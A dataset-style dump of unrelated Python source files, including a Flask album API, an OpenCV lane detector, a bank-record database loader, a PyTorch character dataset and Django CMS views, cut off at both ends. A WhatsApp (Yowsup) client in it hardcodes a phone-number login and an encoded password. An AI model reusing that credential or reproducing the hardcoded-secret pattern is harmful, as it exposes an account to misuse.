def main():
return 0
if __name__ == '__main__':
main()
|
23,556 | 98ce0ef390934403b1f3a69111fa114779cdbd28 | import os
from flask import (
Flask,
render_template,
jsonify,
request,
redirect)
from bson import Binary, Code
from bson.json_util import dumps
import pymongo
app = Flask(__name__)
conn = 'mongodb://localhost:27017'
client = pymongo.MongoClient(conn)
db = client.HipHop100
@app.route('/')
def index():
return render_template("index.html")
@app.route('/credits')
def credits():
return render_template("credits.html")
@app.route('/api/albumData')
def albumData():
albums = list(db.albums.find())
return dumps(albums)
if __name__ == "__main__":
app.run(debug=True)
|
23,557 | 84ece31945d88fe5a88f5b910610e4ecedb2ae24 | import matplotlib.image as mpimg
import numpy as np
import cv2
import math
import os
from moviepy.editor import VideoFileClip
def grayscale(img):
"""Applies the Grayscale transform
This will return an image with only one color channel
but NOTE: to see the returned image as grayscale
(assuming your grayscaled image is called 'gray')
you should call plt.imshow(gray, cmap='gray')"""
return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Or use BGR2GRAY if you read an image with cv2.imread()
# return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
def canny(img, low_threshold, high_threshold):
"""Applies the Canny transform"""
return cv2.Canny(img, low_threshold, high_threshold)
def gaussian_blur(img, kernel_size):
"""Applies a Gaussian Noise kernel"""
return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)
def region_of_interest(img, vertices):
"""
Applies an image mask.
Only keeps the region of the image defined by the polygon
formed from `vertices`. The rest of the image is set to black.
"""
# defining a blank mask to start with
mask = np.zeros_like(img)
# defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
# filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
# returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def draw_lines(img, lines, color=[255, 0, 0], thickness=6):
"""
NOTE: this is the function you might want to use as a starting point once you want to
average/extrapolate the line segments you detect to map out the full
extent of the lane (going from the result shown in raw-lines-example.mp4
to that shown in P1_example.mp4).
Think about things like separating line segments by their
slope ((y2-y1)/(x2-x1)) to decide which segments are part of the left
line vs. the right line. Then, you can average the position of each of
the lines and extrapolate to the top and bottom of the lane.
This function draws `lines` with `color` and `thickness`.
Lines are drawn on the image inplace (mutates the image).
If you want to make the lines semi-transparent, think about combining
this function with the weighted_img() function below
"""
left_slope = []
right_slope = []
left_center = []
right_center = []
left_len = []
right_len = []
slope_eps = 0.35
def length(x1, y1, x2, y2):
return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
for line in lines:
for x1, y1, x2, y2 in line:
slope = (y2 - y1) / (x2 - x1)
center = (x1 + x2) / 2, (y1 + y2) / 2
if slope < -slope_eps:
left_slope.append(slope)
left_center.append(center)
left_len.append(length(x1, y1, x2, y2))
elif slope > slope_eps:
right_slope.append(slope)
right_center.append(center)
right_len.append(length(x1, y1, x2, y2))
left_slope = np.array(left_slope)
right_slope = np.array(right_slope)
start_y = img.shape[0] * 0.6
end_y = img.shape[0]
if len(left_slope > 0):
left_cnt = 0
left_center_mean = 0, 0
left_slope_mean = 0
for i in range(len(left_slope)):
left_center_mean = left_center_mean[0] + left_len[i] * left_center[i][0], left_center_mean[1] + left_len[
i] * left_center[i][1]
left_slope_mean += left_slope[i] * left_len[i]
left_cnt += left_len[i]
if left_cnt > 0:
left_slope_mean = np.mean(left_slope)
left_center_mean = np.mean([c[0] for c in left_center]), np.mean([c[1] for c in left_center])
left_start = int((start_y - left_center_mean[1]) / left_slope_mean + left_center_mean[0]), int(start_y)
left_end = int((end_y - left_center_mean[1]) / left_slope_mean + left_center_mean[0]), int(end_y)
cv2.line(img, left_start, left_end, color, thickness)
if len(right_slope > 0):
right_center_mean = 0, 0
right_slope_mean = 0
right_cnt = 0
for i in range(len(right_slope)):
right_center_mean = right_center_mean[0] + right_len[i] * right_center[i][0], right_center_mean[1] + \
right_len[i] * right_center[i][1]
right_slope_mean += right_slope[i] * right_len[i]
right_cnt += right_len[i]
if right_cnt > 0:
right_slope_mean = np.mean(right_slope)
right_center_mean = np.mean([c[0] for c in right_center]), np.mean([c[1] for c in right_center])
right_start = int((start_y - right_center_mean[1]) / right_slope_mean + right_center_mean[0]), int(start_y)
right_end = int((end_y - right_center_mean[1]) / right_slope_mean + right_center_mean[0]), int(end_y)
cv2.line(img, right_start, right_end, color, thickness)
def hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):
"""
`img` should be the output of a Canny transform.
Returns an image with hough lines drawn.
"""
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len,
maxLineGap=max_line_gap)
line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
draw_lines(line_img, lines)
return line_img
# Python 3 has support for cool math symbols.
def weighted_img(img, initial_img, α=0.8, β=1., λ=0.):
"""
`img` is the output of the hough_lines(), An image with lines drawn on it.
Should be a blank image (all black) with lines drawn on it.
`initial_img` should be the image before any processing.
The result image is computed as follows:
initial_img * α + img * β + λ
NOTE: initial_img and img must be the same shape!
"""
return cv2.addWeighted(initial_img, α, img, β, λ)
def Lane_finding(img, kernel_size=5, low_threshold=50, high_threshold=150, rho=2,
theta=np.pi / 180, threshold=15, min_line_len=60, max_line_gap=30):
imshape = img.shape
gray_img = grayscale(img)
blur_img = gaussian_blur(gray_img, kernel_size)
edges = canny(blur_img, low_threshold, high_threshold)
vertics = np.array([[(0, imshape[0]), (imshape[1] / 2.0 - 20, imshape[0] * 0.6),
(imshape[1] / 2.0 + 20, imshape[0] * 0.6), (imshape[1], imshape[0])]], dtype=np.int32)
edges = region_of_interest(edges, vertics)
line_img = hough_lines(edges, rho, theta, threshold, min_line_len, max_line_gap)
return line_img
input_path = '/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/test_images'
output_path = '/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/processed/'
test_images = os.listdir(input_path)
for i in test_images:
path = input_path + '/' + i
image = mpimg.imread(path)
processed_image = Lane_finding(image)
path = output_path + '/' + i
mpimg.imsave(path, processed_image, format='jpg')
def process_image(image):
# NOTE: The output you return should be a color image (3 channel) for processing video below
# you should return the final output (image where lines are drawn on lanes)
line_img = Lane_finding(image)
result = weighted_img(line_img, image)
return result
white_output = '/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/test_video_out/solidWhiteRight.mp4'
# To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
# To do so add .subclip(start_second,end_second) to the end of the line below
# Where start_second and end_second are integer values representing the start and end of the subclip
# You may also uncomment the following line for a subclip of the first 5 seconds
#clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("/home/charleschan/PycharmProjects/basic-lane-lines-detection-project/test_video/solidWhiteRight.mp4")
white_clip = clip1.fl_image(process_image) # NOTE: this function expects color images!!
white_clip.write_videofile(white_output, audio=False)
|
23,558 | 2079c4bc179d513a057b1cbecd93b8cea6bfaf8a | from uuid import uuid4
from database.connector import connect
import datetime as dt
import json
import pandas as pd
from sql import sql_service
def prepare_bank_meta_data(banks, country_code):
metadata_list = []
for key, data in banks.iterrows():
banks_metadata = {}
metadata = {'BankName': str(data['name']).encode('utf-8', 'ignore').decode('utf-8', 'ignore'),
'BankCode': str(data['bank_code']).encode('utf-8', 'ignore').decode('utf-8', 'ignore'),
'PayeeCode': 'TRG', 'SubPayeeAgencyName': 'Agency Name', 'pocID': '',
'DestinationCountryISOCode': str(country_code).encode('utf-8', 'ignore').decode('utf-8', 'ignore')}
banks_metadata['data'] = json.dumps(metadata)
banks_metadata['bank_id'] = data['bank_id']
banks_metadata['company_id'] = data['company_id']
metadata_list.append(banks_metadata)
return metadata_list
def prepare_bank_branch(branch_info):
bank_branches = pd.DataFrame()
bank_branches['name'] = branch_info['name']
bank_branches['bank_id'] = branch_info['bank_id']
bank_branches['payment_type_code'] = 'D'
bank_branches = bank_branches.fillna('Not Available')
return bank_branches
def prepare_branch_metadata(branch_info):
metadata_list = []
columns = branch_info.columns.tolist()
branch_info = branch_info.fillna('Not Available')
for key, data in branch_info.iterrows():
banks_metadata = {}
metadata = {'BranchName': data['name']}
if 'branch_code' in columns:
metadata['BranchCode'] = str(data['branch_code']).encode('utf-8', 'ignore').decode('utf-8', 'ignore')
if 'address' in columns:
metadata['Address'] = data['address'].encode('utf-8', 'ignore').decode('utf-8', 'ignore')
if 'city' in columns:
metadata['City'] = data['city'].encode('utf-8', 'ignore').decode('utf-8', 'ignore')
if 'state' in columns:
metadata['State'] = data['state'].encode('utf-8', 'ignore').decode('utf-8', 'ignore')
if 'district' in columns:
metadata['District'] = data['district'].encode('utf-8', 'ignore').decode('utf-8', 'ignore')
if 'routing_no' in columns:
metadata['RoutingNumber'] = str(data['routing_no']).encode('utf-8', 'ignore').decode('utf-8', 'ignore')
banks_metadata['data'] = json.dumps(metadata)
banks_metadata['branch_id'] = data['branch_id']
banks_metadata['company_id'] = 7
metadata_list.append(banks_metadata)
print("MetaDatalist=", len(metadata_list))
return metadata_list
def insert_bank_metadata(bank_data, country_code, cur):
banks = sql_service.fetch_data('bank', ['id', 'name', 'country_id'], cur)
banks.columns = ['bank_id', 'name', 'country_id']
existing_data = sql_service.fetch_data('bank_metadata', ['data', 'bank_id', 'company_id'], cur)
bank_data['name'] = pd.Series(bank_data['name']).str.title()
bank_data.drop_duplicates(subset=['name']).reset_index(drop=True)
print('existing banks=', len(banks))
print("bankData=", len(bank_data))
print('existingBankMetadata=', len(existing_data))
insert_data = pd.DataFrame(prepare_bank_meta_data(pd.merge(bank_data, banks), country_code))
print('insertData=', len(insert_data))
data_to_insert = sql_service.remove_duplicate_data(existing_data, insert_data)
print('dataToInsert=', len(data_to_insert))
sql_service.bulk_insert('bank_metadata', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
return
def enable_mto_bank(country_id, company_id):
print("Enabling bank with country id: %s and for mto: %s" % (country_id, company_id))
banks = sql_service.fetch_data('bank', ['id', 'country_id'])
data_to_insert = banks[banks['country_id'] == country_id][['id']]
data_to_insert.columns = ['bank_id']
data_to_insert['id'] = data_to_insert.index.to_series().map(lambda x: str(uuid4()))
data_to_insert['created_at'] = dt.datetime.now()
data_to_insert['company_id'] = company_id
data_to_insert = data_to_insert[['id', 'created_at', 'bank_id', 'company_id']]
print('dataToInsert=', data_to_insert[:5])
sql_service.bulk_insert('mto_bank', data_to_insert.columns.tolist(), data_to_insert.values.tolist())
print("--------------------Insertion Complete--------------------")
def insert_banks(sheets):
conn = connect()
cur = conn.cursor()
countries = sql_service.fetch_data('country', ['id', 'name', 'three_char_code'], cur)
for countryCode in sheets.keys():
try:
country = sql_service.fetch_country_by_code(countries, countryCode)
except IndexError as e:
print("--------------------Country not found--------------------")
print("--------------------Aborting insert for %s--------------------" % countryCode)
continue
print(
"Inserting banks for %s.........................................................." % country['name'].values[
0])
banks = pd.DataFrame(sheets[countryCode])
banks['country_id'] = country['id'].values[0]
banks['name'] = pd.Series(banks['name']).str.title()
banks.drop_duplicates(subset=['name']).reset_index(drop=True)
existing_banks = sql_service.fetch_data('bank', ['name', 'country_id'], cur)
print('banks=', len(banks))
print('existingBanks=', len(existing_banks))
data_to_insert = sql_service.remove_duplicate_data(existing_banks, banks[['name', 'country_id']])
print('dataToInsert=', len(data_to_insert))
sql_service.bulk_insert('bank', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
print("Inserting bank metadata for %s.........................................................." %
country['name'].values[0])
insert_bank_metadata(banks, countryCode, cur)
print("--------------------Insertion Complete--------------------")
cur.execute('END;')
cur.close()
conn.close()
return
def insert_branch_metadata(branch_info, cur):
branches = sql_service.fetch_data('bank_branch', ['id', 'name', 'bank_id'], cur)
branches.columns = ['branch_id', 'name', 'bank_id']
existing_data = sql_service.fetch_data('branch_metadata', ['data', 'branch_id', 'company_id'], cur)
print("existingData=", len(existing_data))
print("branchInfo=", len(branch_info))
print("branches=", len(branches))
print("afterMerge=", len(pd.merge(branch_info, branches)))
print("anotherMerge=", len(branches.merge(branch_info)))
insert_data = pd.DataFrame(prepare_branch_metadata(pd.merge(branch_info, branches)))
print("insertData=", len(insert_data))
data_to_insert = sql_service.remove_duplicate_data(existing_data, insert_data)
print("dataToInsert=", len(data_to_insert))
sql_service.bulk_insert('branch_metadata', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
return
def insert_bank_branch(sheets):
conn = connect()
cur = conn.cursor()
banks = sql_service.fetch_data('bank', ['id', 'name', 'country_id'], cur)
banks.columns = ['bank_id', 'bank_name', 'country_id']
countries = sql_service.fetch_data('country', ['id', 'name', 'three_char_code'], cur)
for countryCode in sheets.keys():
try:
country = sql_service.fetch_country_by_code(countries, countryCode)
except IndexError as e:
print("--------------------Country not found--------------------")
print("--------------------Aborting insert for %s--------------------" % countryCode)
continue
print(
"Inserting banks for %s.........................................................." % country['name'].values[
0])
branch_info = pd.DataFrame(sheets[countryCode])
branch_info['name'] = pd.Series(branch_info['name']).str.title()
branch_info['bank_name'] = pd.Series(branch_info['bank_name']).str.title()
branch_info.drop_duplicates(subset=['name']).reset_index(drop=True)
branch_info['country_id'] = country['id'].values[0]
print("branchInfo=", len(branch_info))
print(branch_info[:2], banks[:2])
branch_info = banks.merge(branch_info)
print("branchInfo=", len(branch_info))
insert_data = prepare_bank_branch(branch_info)
existing_data = sql_service.fetch_data('bank_branch', ['name', 'bank_id', 'payment_type_code'], cur)
data_to_insert = sql_service.remove_duplicate_data(existing_data, insert_data)
print("insertData=", len(insert_data))
print('existingData=', len(existing_data))
print('dataToInsert=', len(data_to_insert))
print("Inserting branch metadata for %s.........................................................." %
country['name'].values[0])
sql_service.bulk_insert('bank_branch', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
insert_branch_metadata(branch_info, cur)
print("--------------------Insertion Complete--------------------")
cur.execute('END;')
cur.close()
conn.close()
return
|
23,559 | 413cdd2f98f047fb2bdf626cf87c628a30d7913d | import os
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
os.sys.path.insert(0,parentdir)
import time, base64
from Yowsup.connectionmanager import YowsupConnectionManager
class WhatsappProfileClient:
def __init__(self, phone_number):
connectionManager = YowsupConnectionManager()
self.signalsInterface = connectionManager.getSignalsInterface()
self.methodsInterface = connectionManager.getMethodsInterface()
self.signalsInterface.registerListener("auth_success", self.onAuthSuccess)
self.signalsInterface.registerListener("auth_fail", self.onAuthFailed)
self.signalsInterface.registerListener("disconnected", self.onDisconnected)
# self.signalsInterface.registerListener("profile_setPictureSuccess", self.onSetProfilePicture)
# self.signalsInterface.registerListener("profile_setPictureError", self.onSetProfilePictureError)
self.signalsInterface.registerListener("contact_gotProfilePicture", self.onGotProfilePicture)
# self.signalsInterface.registerListener("profile_setStatusSuccess", self.onSetStatusSuccess)
self.phone_number = phone_number
self.done = False
def login(self, username, password):
self.username = username
self.methodsInterface.call("auth_login", (username, password))
while not self.done:
time.sleep(0.5)
def onAuthFailed(self, username, err):
print("Auth Failed!")
def onDisconnected(self, reason):
print("Disconnected because %s" %reason)
def onSetProfilePictureError(self, errorCode):
print("Fail to set pic: " % errorCode)
self.done = True
def onGotProfilePicture(self, filePath):
print("Got the profile pic %s" %filePath)
self.done = True
def onSetProfilePicture(self):
print("GETTING MY PICTURE")
self.done = True
def onSetStatusSuccess(self, jId, messageId):
print("Set the status")
self.done = True
def onAuthSuccess(self, username):
print("Authed %s" % username)
self.methodsInterface.call("contact_getProfilePicture", (self.phone_number,))
# self.methodsInterface.call("profile_setPicture",('logo.jpg',))
# self.done = True
login = "254733171036"
password = "+rYGoEyk7y9QBGLCSHuPS2VVZNw="
password = base64.b64decode(bytes(password.encode('utf-8')))
wa = WhatsappProfileClient("61450212500")
wa.login(login, password)
|
23,560 | 22edb00a1b0f57e58a1bf3551990ce889aadea32 | import tweepy
import twappconfig as tw
from tweepy import OAuthHandler
import json
auth = OAuthHandler(tw.ckey,tw.csecret)
auth.set_access_token(tw.akey,tw.asecret)
api = tweepy.API(auth)
count=0
for tweet in tweepy.Cursor(api.search,q="#modi",rpp=1,result_type="recent",include_entities=True,lang="en").items(10):
count+=1
for ele in tweet.entities['hashtags']:
print(ele)
print("\n")
|
23,561 | 135da78f16a11344e2764568fa22955259edeb84 | import io
import numpy as np
#from torchtext import data
from collections import defaultdict
from torch.utils.data import Dataset, DataLoader
import torch
import random
"""
PTBCDataset
Input:
dataType: Please choose among "train", "valid", "test"
ixToword: If there exists text <-> textual id dictionary, put it here
wordToix: If there exists text <-> textual id dictionary, put it here
THRESHOLD: Default is 5. This only adds characters to dictionary only when it appears more times than the threshhold.
Output:
None
Description:
This dataset uses following preprocessing strategy
<pad> : To make all tensors have equal size (Not used but just in case. April 8, 2020)
<bos> : Beginning of the sentence
<eos> : End of the sentence
<unk> : For unknown characters
_ : Whitespace
<mask> : Mask
"""
class PTBCDataset(Dataset):
urls = ['data/pennchar/train.txt',
'data/pennchar/valid.txt',
'data/pennchar/test.txt']
def __init__(self, dataType, ixtoword=None, wordtoix=None, minSeq = 16, maxSeq = 128, THRESHOLD=5):
self.minSeq = minSeq
self.maxLen = maxSeq
self.data = self.loadData(dataType)
self.threshhold = THRESHOLD
self.wordtoix, self.ixtoword = wordtoix, ixtoword
self.textual_ids = self.build_dictionary()
self.padded_ids = None
self.vocab_size = len(self.wordtoix)
print("Sample Data Loaded")
print(self.data[124])
# print("Coverted into textual_ids")
print("0: <pad>, 1: <bos>, 2: <eos>, 3: <unk>, 4: _, 5: <mask>, 6~:abcd...z + special")
# print(self.textual_ids[124])
print("Start Padding to make every data have same length")
self.padded_ids = [self.pad_sequences(x, self.maxLen) for x in self.textual_ids]
print(self.padded_ids[124])
def getMaxLength(self, list):
result = max(len(t) for t in list)
result = self.adjustMaxSize(result)
return result
''' Torch size follows: (3n + 4) * 16 where n equals digits from system argument '''
def adjustMaxSize(self, a):
if a % 16 == 0 and (a /16 - 4)%3 == 0:
pass
else:
while (a % 16 != 0 or (a /16 - 4)%3 != 0):
a +=1
return a
def pad_sequences(self, x, max_len):
padded = np.zeros((max_len), dtype=np.int64)
if len(x) > max_len: padded[:] = x[:max_len]
else: padded[:len(x)] = x
return padded
def build_dictionary(self):
""" Add to dictionary """
freqDict = defaultdict(int)
wordDict = defaultdict(str)
ixtoword = defaultdict(int)
#{'<pad>':0, '<bos>':1, '<eos>':2, '<unk>': 3, '_':4, 'mask': 5}
with io.open('dicts.txt', encoding='UTF-8') as f:
for i, line in enumerate(f):
for c in line.split(' '):
wordDict[c.rstrip('\n')] = i
ixtoword[i] = line.split(' ')[0].rstrip('\n')
""" Build text <-> textual id Dictionary """
if self.ixtoword == None or self.wordtoix == None:
self.wordtoix = wordDict
self.ixtoword = {i: word for i, word in enumerate(wordDict)}
"""
Convert full text into textual ids
Addes <bos> and <eos> at the beginning and the end of the sentence respectively
Description:
textual_ids:
[ ['<bos>', 'a', 'b', 'c', '<eos>'],
['<bos>', 'a', 'b', 'c', '<eos>'] ]
vectorized_ids:
[ '<bos>', 'a', 'b', 'c', '<eos>', '<bos>', 'a', 'b', 'c', <eos> ]
"""
textual_ids = list()
for i in range(0, len(self.data)):
temp = list()
temp.append(self.wordtoix.get('<bos>'))
for word in self.data[i]:
if word in self.wordtoix:
temp.append(self.wordtoix.get(word))
else:
temp.append(self.wordtoix.get('<etc>'))
temp.append(self.wordtoix.get('<eos>'))
textual_ids.append(temp)
return textual_ids
def loadData(self, dataType):
""" Load path of text file """
if dataType == "train":
f = self.urls[0]
elif dataType == "valid":
f = self.urls[1]
elif dataType == "test":
f = self.urls[2]
""" Load text file """
corpus = list()
with io.open(f, encoding='UTF-8') as f:
for line in f:
if len(line) > self.minSeq and len(line) < self.maxLen:
corpus.append(line.lstrip().rstrip().split(' '))
return corpus
def onehot_encoder(self, idxs):
vec = np.zeros([self.maxLen, self.vocab_size], dtype=np.float32)
for i, id in enumerate(idxs):
vec[i, id] = 1
return vec
def __getitem__(self, index):
x = self.padded_ids[index]
# x = np.asarray(x, dtype=np.float32)
masked, target = self.splitWithMask(x)
#target = self.pad_sequences(target, masked.shape[0])
#masked = self.onehot_encoder(masked)
# target = self.onehot_encoder(target)
return masked, target
def __len__(self):
return len(self.textual_ids)
############################################
# Mask Random Words
############################################
def splitWithMask(self, idxs):
whiteSpaceList = list()
eosIdx = None
masked = np.asarray([i for i in idxs])
for i, v in enumerate(idxs):
if v == self.wordtoix.get('_'):
whiteSpaceList.append(i)
if v == self.wordtoix.get('<eos>'):
eosIdx = i
# If there are more than two words
# ex: [4, 10, 19, 24, 27, eosIdx]
if len(whiteSpaceList) > 0:
whiteSpaceList.append(eosIdx)
startIdx = random.randint(0, len(whiteSpaceList)-2)
endIdx = startIdx + 1
masked[whiteSpaceList[startIdx]+1: whiteSpaceList[endIdx]] = self.wordtoix.get('<mask>')
return masked, idxs
# If there is one word, return original text. eg) Hello
else:
return idxs, idxs
if __name__ == '__main__':
dataset = PTBCDataset('train') # Use among 'train', 'valid', 'test'
dataset.__getitem__(124)
loader = DataLoader(dataset, batch_size=4)
print(dataset.wordtoix) |
23,562 | c700fb0c1b409d06d1872c0a2159dd25a90958e3 | #!/usr/bin/python3
from fontParts.world import *
import sys
# Open UFO
ufo = sys.argv[1]
font = OpenFont(ufo)
# Modify UFO
## Decompose all glyphs
for glyph in font:
glyph.decompose()
# Save UFO
font.changed()
font.save()
font.close()
|
23,563 | 7c337d579a8fe81e8da690a2ef4807cb7949540f | # pages / views.py
import logging
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import render_to_response, redirect
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.core.cache import cache
from django.views.decorators.cache import cache_page
from django.contrib import messages
from django.contrib.syndication.views import Feed
from django.utils.feedgenerator import Rss201rev2Feed
from django.template.defaultfilters import truncatewords, striptags, slugify
import django.contrib.sitemaps.views as sitemap_views
from pages.sitemap import WebsiteSitemap
from modules.models import Module, Article
from modules.templatetags.module_filters import article_page_url, str_to_datetime
from pages.models import Page
from pages.forms import PageForm
from cms.utils import purge_varnish
def render(request):
#import pdb; pdb.set_trace()
""" Render page of a website. """
if not request.website:
return HttpResponse('No CMS found. :-(')
(page, parameters) = request.website.get_current_page(request.path)
if not page:
raise Http404
editor = None
edit_mode = False
context = RequestContext(request)
if request.user.is_authenticated():
editor = page.get_editor()
if not editor:
editor = page.set_editor(request.user, request.COOKIES['sessionid'])
page.modules.filter(parent=None, is_published=False, is_deleted=False).all().delete()
modules = list(page.get_published_modules())
for module in modules:
module.create_temporary_module(context)
if editor and editor.user.id == request.user.id:
edit_mode = True
modules = list(page.get_temporary_modules())
else:
modules = list(page.get_published_modules())
return render_to_response(page.get_template(),
{'page': page, 'parameters': parameters, 'edit_mode': edit_mode, 'editor': editor,
'modules': modules}, context)
def status(request):
"""Health check for Varnish server"""
return HttpResponse('Hi, I am healty!')
@login_required
def add(request, page_id=None):
"""
Adds and Edits a page of a website.
"""
context = RequestContext(request)
if page_id:
page = Page.objects.get(pk=page_id)
editor = page.get_editor()
if editor and editor.user.id != request.user.id:
# msg = 'You can\'t edit this page because %s is updating it now' % (
# str(request.user.email)
# )
# messages.add(request, msg)
return HttpResponse('locked')
else:
page = None
if request.method == 'POST':
submitted_data = request.POST.copy()
submitted_data['website'] = request.website.id
if request.POST['id']:
page = Page.objects.get(pk=request.POST['id'], website=request.website)
form = PageForm(website=request.website, data=submitted_data, instance=page)
if form.is_valid():
form.save()
if page:
page.clear_cache(context)
cache.delete('%s_%s_pages' % (request.website.subdomain, str(request.website.id)))
return redirect("/editor/page/list")
else:
form = PageForm(website=request.website, instance=page)
try :
return render_to_response('websites/%s/forms/add-edit-form.html' % (request.website.subdomain),{'page': page, 'form': form}, context)
except :
return render_to_response("pages/add-edit-form.html", {'page': page, 'form': form}, context)
@login_required
def delete(request, page_id):
"""
Deletes page from a website.
"""
page = Page.objects.get(pk=page_id)
error_messge = ""
if page:
try:
editor = page.get_editor()
if editor and editor.user.id != request.user.id:
# msg = 'You can\'t delete this page because %s is editing it' % (
# str(request.user.email)
# )
# messages.add(request, msg)
return HttpResponse('locked')
page.delete()
cache.delete('%s_%s_pages' % (request.website.subdomain, str(request.website.id)))
error_messge = "true"
messages.success(request, '%s has been deleted successfully.' % page.title)
except:
error_messge = "There is some Problem Appear . Please Try again Later"
else:
error_messge = "Sorry! Your requested page doesn't exist."
return HttpResponse(error_messge)
@login_required
def list_pages(request):
"""
List all pages of a website.
"""
context = RequestContext(request)
pages = request.website.get_pages()
return render_to_response("pages/list_pages.html", {"pages": pages}, context)
@login_required
def publish(request):
"""Published page of a CMS"""
context = RequestContext(request)
page = Page.objects.get(website=request.website, url=request.POST['page_route'])
try:
page.publish(context)
page.clear_cache(context)
purge_varnish(request)
except Exception, e:
# log error
raise e
return HttpResponse('error')
messages.success(request, 'Your changes have been published successfully.')
return HttpResponse('true')
@login_required
def force_edit(request, page_id):
"""
Deletes page from a website.
"""
context = RequestContext(request)
try:
page = Page.objects.get(pk=page_id)
except Exception, e:
raise e
page.clear_editor()
page.clear_cache(context)
return HttpResponseRedirect(request.META['HTTP_REFERER'])
def robots(request):
template = 'websites/%s/partials/robots.txt' % request.website.subdomain
return render_to_response(template, RequestContext(request), mimetype="text/plain")
def show_404(request):
context = RequestContext(request)
template = 'websites/%s/layouts/404.html' % request.website.subdomain
return render_to_response(template, context)
def show_500(request):
context = RequestContext(request)
template = 'websites/%s/layouts/500.html' % request.website.subdomain
return render_to_response(template, context)
def google_code(request, code):
context = RequestContext(request)
template = 'websites/%s/partials/google%s.html' % (request.website.subdomain, code)
try:
return render_to_response(template, context, mimetype="text/plain")
except:
raise Http404
def live_search_code(request):
context = RequestContext(request)
template = 'websites/%s/partials/LiveSearchSiteAuth.xml' % (request.website.subdomain)
try:
return render_to_response(template, context, mimetype="application/xml")
except:
raise Http404
def bing_code(request):
context = RequestContext(request)
template = 'websites/%s/partials/BingSiteAuth.xml' % (request.website.subdomain)
try:
return render_to_response(template, context, mimetype="application/xml")
except:
raise Http404
def yahoo_code(request, code):
context = RequestContext(request)
template = 'websites/%s/partials/y_key_%s.html' % (request.website.subdomain, code)
try:
return render_to_response(template, context, mimetype="text/plain")
except:
raise Http404
def rss(request):
context = RequestContext(request)
feed = Rss201rev2Feed(title='%s - Latest News' % request.website.name,
link=u'http://%s' % request.get_host(),
feed_url=request.build_absolute_uri(),
description=u''
)
try:
pages = Page.objects.filter(website=request.website).all()
for page in pages:
modules = page.modules.filter(is_published=True, module_type='editors-picks').all()
for module in modules:
articles = list(module.articles.order_by('-updated_at').all())
for article in articles:
feed.add_item(title=article.title,
link='http://%s%s' % (request.get_host(), article_page_url(module, article)),
description=truncatewords(striptags(article.description), 50),
pubdate=article.updated_at
)
except Exception, e:
raise e
return HttpResponse(feed.writeString('UTF-8'), mimetype='application/rss+xml')
@cache_page(1 * 60 * 60)
def sitemap(request, subdomain):
class NewsSitemap(WebsiteSitemap):
subdomain = request.website.subdomain
def items(self):
pages = Page.objects.filter(website_id=request.website.id).all()
for page in pages:
if page.url.find(':articleId') == -1 and\
page.url.find(':topicId') == -1 and\
page.url.find(':imageId') == -1 and\
page.url.find(':category') == -1:
page.location = page.url
self.all_pages.append(page)
# Editor's Picks Module
editorpicks_module = Module.objects.filter(page_id=page.id, module_type='editors-picks',
is_deleted=False,
is_published=True)
if editorpicks_module:
for module in editorpicks_module:
if module.link_to == '':
continue
articles = module.get_editors_picks_articles()
if articles == None:
continue
self.get_article_list(module, articles)
# Article List Module
article_list_module = Module.objects.filter(page_id=page.id, module_type='article-list',
is_deleted=False,
is_published=True)
if article_list_module:
context = {}
context['request'] = request
context['parameters'] = None
for module in article_list_module:
if module.url_parameter != '':
continue
if module.link_to == '':
continue
module.is_cached = False
articles = module.render_article_list(context, None, False)
if articles == None:
continue
self.get_article_list(module, articles)
# Featured Article List Modules
featured_article_list_module = Module.objects.filter(page_id=page.id,
module_type='featured-article-list', is_deleted=False,
is_published=True)
if featured_article_list_module:
context = {}
context['request'] = request
context['parameters'] = None
for module in featured_article_list_module:
sub_modules = list(module.sub_modules.all())
for smodule in sub_modules:
if smodule.url_parameter != '':
continue
if smodule.link_to == '':
continue
smodule.is_cached = False
articles = smodule.render_article_list(context, None, False)
if articles == None:
continue
self.get_article_list(smodule, articles)
# Image Gallery Modules
image_gallery_modules = Module.objects.filter(page_id=page.id, module_type='image-gallery',
is_deleted=False,
is_published=True)
if image_gallery_modules:
for module in image_gallery_modules:
images = module.images.all()
for image in images:
if not image.guid:
continue
link = page.url.replace(":imageId", image.guid)
image.location = link
self.all_pages.append(image)
return self.all_pages
sitemaps = {
"website": NewsSitemap
}
return sitemap_views.sitemap(request, sitemaps, None, 'websites/' + subdomain + '/sitemaps/sitemap.html')
@cache_page(1 * 60 * 60)
def latestnews(request, subdomain):
class LatestNews(WebsiteSitemap):
subdomain = request.website.subdomain
def items(self):
pages = Page.objects.filter(website_id=request.website.id).all()
for page in pages:
# Editor's Picks Module
editorpicks_module = Module.objects.filter(page_id=page.id, module_type='editors-picks',
is_deleted=False,
is_published=True)
if editorpicks_module:
for module in editorpicks_module:
if module.link_to == '':
continue
articles = module.get_editors_picks_articles()
if articles == None:
continue
self.get_article_list(module, articles)
# Article List Module
article_list_module = Module.objects.filter(page_id=page.id, module_type='article-list',
is_deleted=False,
is_published=True)
if article_list_module:
context = {}
context['request'] = request
context['parameters'] = None
for module in article_list_module:
if module.url_parameter != '':
continue
if module.link_to == '':
continue
module.is_cached = False
